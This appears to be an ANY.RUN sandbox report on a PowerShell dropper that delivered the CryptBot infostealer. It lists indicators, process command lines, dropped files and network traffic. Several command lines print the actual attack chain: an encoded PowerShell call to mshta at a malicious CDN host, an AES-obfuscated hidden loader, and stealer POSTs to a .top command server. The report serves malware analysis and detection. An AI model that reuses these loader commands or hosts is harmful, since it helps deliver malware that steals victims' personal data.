File name: | verifyhuman476.b-cdn.net.ps1 |
Full analysis: | https://app.any.run/tasks/3585f0a7-2500-47c5-9993-50b2c6f68c61 |
Verdict: | Malicious activity |
Threats: | CryptBot is an advanced Windows-targeting infostealer delivered via pirate sites with "cracked" software. It was first observed in the wild in 2019. |
Analysis date: | August 08, 2024, 18:36:24 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | stealer cryptbot |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 9433ED9D985D6F93E0A168C417B7F01C |
SHA1: | 16F4FB0839CFB4D008537D87906AEE0621646C27 |
SHA256: | |
SSDEEP: | 3:VSJJLNyAmarBanfknMVpvF7HMV20RtkpfhAi11H6Bto2kO7Heh:snyuW5VpvF7HMEvpfhJDH6ByDO7Hs |
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
MALICIOUS
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 7096)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 6164)
Run PowerShell with an invisible window
- powershell.exe (PID: 6164)
Bypass execution policy to execute commands
- powershell.exe (PID: 6400)
Scans artifacts that could help determine the target
- mshta.exe (PID: 7096)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 6164)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6164)
Connects to the CnC server
- svchost.exe (PID: 2256)
- ShowbizFender.pif (PID: 7108)
CRYPTBOT has been detected (SURICATA)
- svchost.exe (PID: 2256)
- ShowbizFender.pif (PID: 7108)
Actions looks like stealing of personal data
- ShowbizFender.pif (PID: 7108)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- powershell.exe (PID: 6400)
- mshta.exe (PID: 7096)
Application launched itself
- powershell.exe (PID: 6400)
Process drops legitimate windows executable
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
Drops the executable file immediately after the start
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 7096)
BASE64 encoded PowerShell command has been detected
- powershell.exe (PID: 6400)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 7096)
Cryptography encrypted command line is found
- powershell.exe (PID: 6164)
Base64-obfuscated command line is found
- powershell.exe (PID: 6400)
Executable content was dropped or overwritten
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 6164)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6164)
Gets file extension (POWERSHELL)
- powershell.exe (PID: 6164)
Starts application with an unusual extension
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Drops a file with a rarely used extension (PIF)
- more.com (PID: 1360)
Searches for installed software
- ShowbizFender.pif (PID: 7108)
INFO
Checks proxy server information
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
Reads Internet Explorer settings
- mshta.exe (PID: 7096)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6164)
Disables trace logs
- powershell.exe (PID: 6164)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 6164)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 6164)
Checks supported languages
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
- StrCmp.exe (PID: 6280)
- ShowbizFender.pif (PID: 7108)
Creates files or folders in the user directory
- Setup.exe (PID: 6444)
Reads the computer name
- Setup.exe (PID: 6444)
- StrCmp.exe (PID: 6280)
- more.com (PID: 1360)
- ShowbizFender.pif (PID: 7108)
The executable file from the user directory is run by the Powershell process
- Setup.exe (PID: 6444)
Create files in a temporary directory
- more.com (PID: 1360)
- Setup.exe (PID: 6444)
Reads the machine GUID from the registry
- ShowbizFender.pif (PID: 7108)
Reads CPU info
- ShowbizFender.pif (PID: 7108)
No Malware configuration.
No data.
Total processes
141
Monitored processes
13
Malicious processes
8
Suspicious processes
Behavior graph
Process information
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version |
---|---|---|---|---|---|---|---|---|---|---|
6400 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\verifyhuman476.b-cdn.net.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | | 10.0.19041.1 (WinBuild.160101.0800) |
6408 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | | 10.0.19041.1 (WinBuild.160101.0800) |
6808 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQB2ADEALgBiAC0AYwBkAG4ALgBuAGUAdAAvAG0AaQBjAHIAbwAtAHYAMQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | | 10.0.19041.1 (WinBuild.160101.0800) |
7096 | "C:\WINDOWS\system32\mshta.exe" https://microsoftcamp-v1.b-cdn.net/micro-v1 | C:\Windows\System32\mshta.exe | | powershell.exe | admin | Microsoft Corporation | MEDIUM | Microsoft (R) HTML Application host | | 11.00.19041.1 (WinBuild.160101.0800) |
6164 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RbIcrhkL($BaAb){return -split ($BaAb -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$VKDfBkU = RbIcrhk…vkWTG = [System.Security.Cryptography.Aes]::Create();$vkWTG.Key = RbIcrhkL('6B644D67514D625170774950714F5359');$vkWTG.IV = New-Object byte[] 16;$FDxCnWus = $vkWTG.CreateDecryptor();$QHPEsJoUj = $FDxCnWus.TransformFinalBlock($VKDfBkU, 0, $VKDfBkU.Length);$rfPIxZhDh = [System.Text.Encoding]::Utf8.GetString($QHPEsJoUj);$FDxCnWus.Dispose();& $rfPIxZhDh.Substring(0,3) $rfPIxZhDh.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | mshta.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | | 10.0.19041.1 (WinBuild.160101.0800) |
460 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | | 10.0.19041.1 (WinBuild.160101.0800) |
6476 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Windows host process (Rundll32) | | 10.0.19041.1 (WinBuild.160101.0800) |
6444 | "C:\Users\admin\AppData\Local\Temp\Setup.exe" | C:\Users\admin\AppData\Local\Temp\Setup.exe | | powershell.exe | admin | Florian Heidenreich | MEDIUM | Mp3tag - the universal Tag editor | 1 | 3.26.0.0 |
6280 | C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe | C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe | — | Setup.exe | admin | aaa | MEDIUM | | | 1.00 |
1360 | C:\WINDOWS\SysWOW64\more.com | C:\Windows\SysWOW64\more.com | | Setup.exe | admin | Microsoft Corporation | MEDIUM | More Utility | | 10.0.19041.1 (WinBuild.160101.0800) |
Total events
24506
Read events
24473
Write events
33
Delete events
Modification events
PID | Process | Key | Operation | Name | Value |
---|---|---|---|---|---|
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | write | CachePrefix | |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | write | CachePrefix | Cookie: |
7096 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | write | CachePrefix | Visited: |
6164 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | write | EnableFileTracing | |
6164 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | write | EnableAutoFileTracing | |
6164 | powershell.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | write | EnableConsoleTracing | |
Executable files
14
Suspicious files
16
Text files
6
Unknown types
Dropped files
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
7096 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | binary | 51883DF11BA0F75D2AAD9E88EBD057DC | 1CC443E507D740FEDC646DCA7116EEAD8084ED9B7C70ABBB34281DD1E7DBBA10 |
7096 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\micro-v1[1] | executable | DE219CB5F5073BE86D74F4BEE29D9E79 | 0581756A656ACE2E7D164B1F66846E9D079755BD7A5CEAD72E73B53AB534531B |
6400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrid0nuv.un3.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jmqnz03m.03m.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vtasglp0.4rb.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
6808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qiw3vsdx.vos.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
6808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_05pqx1ea.0uz.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\K1.zip | compressed | F0E4E16FEB8B7B8E95D81A7F5807164B | AD12C4695218510096F7B75E699A106F877D378B66DD11F86783AC2C40B432C8 |
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\caramel.eps | binary | E94BB41E97E1D8E1EAA638191A74490A | F59A54633E14187EEB907F91C747D0E8B6FB5A970B9CDDED15800B487F20239A |
6400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b2y0hfgw.k42.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
HTTP(S) requests
10
TCP/UDP connections
49
DNS requests
24
Threats
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
7096 | mshta.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O | unknown | — | — | unknown |
6572 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | unknown |
6600 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | unknown |
7096 | mshta.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | unknown | — | — | unknown |
7096 | mshta.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D | unknown | — | — | unknown |
1124 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
5336 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1860 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3260 | svchost.exe | 40.113.103.199:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1124 | svchost.exe | 40.126.32.140:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
5336 | SearchApp.exe | 184.86.251.23:443 | www.bing.com | Akamai International B.V. | DE | unknown |
1124 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5336 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
DNS requests
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com | | whitelisted |
google.com | | whitelisted |
client.wns.windows.com | | whitelisted |
login.live.com | | whitelisted |
www.bing.com | | whitelisted |
ocsp.digicert.com | | whitelisted |
microsoftcamp-v1.b-cdn.net | | unknown |
ocsp.comodoca.com | | whitelisted |
th.bing.com | | whitelisted |
ocsp.usertrust.com | | whitelisted |
Threats
PID | Process | Class | Message |
---|---|---|---|
2256 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Cryptbot CnC DGA Domain (eight8) |
7108 | ShowbizFender.pif | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
No debug info